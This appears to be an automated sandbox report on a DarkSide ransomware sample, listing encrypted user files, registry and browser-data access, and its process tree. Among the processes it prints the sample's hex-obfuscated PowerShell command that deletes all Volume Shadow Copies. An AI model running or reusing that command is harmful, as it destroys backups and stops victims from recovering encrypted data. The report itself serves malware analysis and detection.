Analysis Overview
SHA256
9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
Threat Level: Known bad
The file DarkSide_18_11_2020_17KB.exe was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
UPX packed file
Reads user/profile data of web browsers
Looks up external IP address via web service
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-19 04:04
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-19 04:04
Reported
2022-01-19 04:07
Platform
win10v2004-en-20220112
Max time kernel
143s
Max time network
154s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Pictures\OptimizeUnblock.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RegisterResume.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitWrite.tif => C:\Users\Admin\Pictures\SubmitWrite.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WaitSkip.tif => C:\Users\Admin\Pictures\WaitSkip.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromExit.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DenyAssert.png => C:\Users\Admin\Pictures\DenyAssert.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DenyAssert.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GroupReset.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DenyUninstall.png => C:\Users\Admin\Pictures\DenyUninstall.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GetDebug.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PingEnable.tiff => C:\Users\Admin\Pictures\PingEnable.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnregisterGrant.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromExit.tif => C:\Users\Admin\Pictures\ConvertFromExit.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DenyUninstall.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GetDebug.tif => C:\Users\Admin\Pictures\GetDebug.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PingEnable.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitSkip.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointApprove.crw => C:\Users\Admin\Pictures\CheckpointApprove.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromAdd.tiff | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromAdd.tiff => C:\Users\Admin\Pictures\ConvertFromAdd.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromAdd.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RestoreRestart.raw => C:\Users\Admin\Pictures\RestoreRestart.raw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnregisterGrant.crw => C:\Users\Admin\Pictures\UnregisterGrant.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointApprove.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GroupReset.crw => C:\Users\Admin\Pictures\GroupReset.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OptimizeUnblock.tif => C:\Users\Admin\Pictures\OptimizeUnblock.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PingEnable.tiff | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RegisterResume.png => C:\Users\Admin\Pictures\RegisterResume.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RestoreRestart.raw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SubmitWrite.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | www.iplocation.net | N/A | N/A |
| N/A | www.iplocation.net | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{770F1BB0-78E5-11EC-82D0-DA616A59BCB7} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\NewSend.xls"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\SubmitRename.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\SubmitRename.hta
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3840 CREDAT:17410 /prefetch:2
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7f44f50,0x7ffcc7f44f60,0x7ffcc7f44f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1704 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7f44f50,0x7ffcc7f44f60,0x7ffcc7f44f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4628 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3924 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3900 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5984 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x420 0x2ec
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2748 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=812 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
